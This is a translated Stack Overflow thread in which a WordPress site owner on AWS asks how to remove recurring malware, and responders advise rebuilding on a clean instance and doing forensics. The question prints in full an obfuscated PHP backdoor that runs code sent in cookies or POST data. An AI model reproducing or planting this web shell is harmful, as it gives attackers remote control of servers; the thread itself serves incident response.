恶意软件一次又一次地自主安装答案

【问题标题】：Malware installs itself again and again autonomously恶意软件一次又一次地自主安装
【发布时间】：2020-02-18 08:31:23
【问题描述】：

我们的 aws（托管 Wordpress 和自己的应用程序）实例上有一些恶意软件正在做奇怪的事情：

chmod 755 /var/www/html 独立于之前的情况

将 index.html 复制到 index.html.bak.bak 并删除 index.html 当我在 index.html 上运行 ausearch 时，我被定向到由我们的应用程序管理的文件夹，该文件夹包含一个带有 randomname.php 的对象，例如 mqnwtxzg.php。此类php文件的内容：

$wezhgja = 'incsr_f8y-g6a9kl3ubx\'5vp14d7mt*#oHe';$lcxtas = Array();$lcxtas[] = $wezhgja[2].$wezhgja[6].$wezhgja[2].$wezhgja[21].$wezhgja[27].$wezhgja[18].$wezhgja[11].$wezhgja[27].$wezhgja[9].$wezhgja[27].$wezhgja[24].$wezhgja[25].$wezhgja[2].$wezhgja[9].$wezhgja[25].$wezhgja[21].$wezhgja[13].$wezhgja[11].$wezhgja[9].$wezhgja[13].$wezhgja[7].$wezhgja[27].$wezhgja[12].$wezhgja[9].$wezhgja[24].$wezhgja[16].$wezhgja[18].$wezhgja[21].$wezhgja[24].$wezhgja[18].$wezhgja[18].$wezhgja[2].$wezhgja[25].$wezhgja[18].$wezhgja[24].$wezhgja[2];$lcxtas[] = $wezhgja[2].$wezhgja[4].$wezhgja[34].$wezhgja[12].$wezhgja[29].$wezhgja[34].$wezhgja[5].$wezhgja[6].$wezhgja[17].$wezhgja[1].$wezhgja[2].$wezhgja[29].$wezhgja[0].$wezhgja[32].$wezhgja[1];$lcxtas[] = $wezhgja[33].$wezhgja[30];$lcxtas[] = $wezhgja[31];$lcxtas[] = $wezhgja[2].$wezhgja[32].$wezhgja[17].$wezhgja[1].$wezhgja[29];$lcxtas[] = $wezhgja[3].$wezhgja[29].$wezhgja[4].$wezhgja[5].$wezhgja[4].$wezhgja[34].$wezhgja[23].$wezhgja[34].$wezhgja[12].$wezhgja[29];$lcxtas[] = $wezhgja[34].$wezhgja[19].$wezhgja[23].$wezhgja[15].$wezhgja[32].$wezhgja[26].$wezhgja[34];$lcxtas[] = $wezhgja[3].$wezhgja[17].$wezhgja[18].$wezhgja[3].$wezhgja[29].$wezhgja[4];$lcxtas[] = $wezhgja[12].$wezhgja[4].$wezhgja[4].$wezhgja[12].$wezhgja[8].$wezhgja[5].$wezhgja[28].$wezhgja[34].$wezhgja[4].$wezhgja[10].$wezhgja[34];$lcxtas[] = $wezhgja[3].$wezhgja[29].$wezhgja[4].$wezhgja[15].$wezhgja[34].$wezhgja[1];$lcxtas[] = $wezhgja[23].$wezhgja[12].$wezhgja[2].$wezhgja[14];foreach ($lcxtas[8]($_COOKIE, $_POST) as $tlfwyg => $bdxjqs){function irgndu($lcxtas, $tlfwyg, $zskgpvt){return $lcxtas[7]($lcxtas[5]($tlfwyg . $lcxtas[0], ($zskgpvt / $lcxtas[9]($tlfwyg)) + 1), 0, $zskgpvt);}function fpdyn($lcxtas, $eklrh){return @$lcxtas[10]($lcxtas[2], $eklrh);}function zmychft($lcxtas, $eklrh){$rugfslb = $lcxtas[4]($eklrh) % 3;if (!$rugfslb) {$zttttc = $lcxtas[1]; $tdber = $zttttc("", $eklrh[1]($eklrh[2]));$tdber();exit();}}$bdxjqs = fpdyn($lcxtas, $bdxjqs);zmychft($lcxtas, $lcxtas[6]($lcxtas[3], $bdxjqs ^ irgndu($lcxtas, $tlfwyg, $lcxtas[9]($bdxjqs))));}

在另一个随机文件夹中，我发现如下对象：/somefolder/.5d45a5b3.ico

我们会定期检查这些东西并删除所有这些奇怪的对象，但大约一天后，它们又回来了。唯一改变的是奇怪的对象现在有了不同的名称，并且被放置在不同的文件夹中。

我们正在我们的系统上运行恶意软件扫描，它们会检测到这些对象，但到目前为止还没有阻止它们回来。

有没有人遇到过类似的问题，任何人都可以推荐任何东西来摆脱这些东西吗？

任何人都可以指导我们找到可以提供帮助的人吗，即使该服务需要支付费用？

【问题讨论】：

标签： ubuntu amazon-ec2 malware malware-detection antimalware

【解决方案1】：

您应该专注于确保您的 Wordpress 安装是最新版本并将所有插件更新到最新版本，而不是修复症状。考虑到当前系统已被入侵，请勿尝试“打补丁”。它很可能是后门的。不要相信它。而是备份数据（例如数据库）并使用最新版本在新实例上重建 wordpress 站点。

看看https://wordpress.org/support/article/faq-my-site-was-hacked/ 和 https://wordpress.org/support/article/hardening-wordpress/

【讨论】：

是最新的WP版本...你有更好的建议吗？
您是否安装了任何可能已过期的插件？他们以前过时了吗？以前是否运行过可能安装了后门的旧版 WP？但重点仍然存在：从一个不妥协的新实例重新开始。
所有插件都是最新的，并且过去一直定期更新。问题始于今年四月。重新安装实例非常困难，因为我们每个月在该实例上有 1500 万个数据库连接。关闭并重建将对我们的用户造成重大破坏。应该有办法找出引发这种行为的原因
我的两便士：您的生产系统受到威胁，其中包含潜在的敏感数据。根据您的业务所在的位置，您可能会被法律强制报告（潜在的）数据泄漏。我认为现在是给您的用户带来不便并进行适当分析的时候了。该系统很可能是后门的。是的，有一些方法可以对实时系统进行分析。但是，我强烈建议您将数据迁移到新实例，重新安装前端/后端软件并切换到新的数据库端点。制作旧系统的快照并对其进行彻底分析。
此外，请查看 medium.com/@lakin.mohapatra/…，因为它特别提到了受恶意软件感染的 Wordpress 上的恶意 .ico 文件以及如何继续查找根本原因。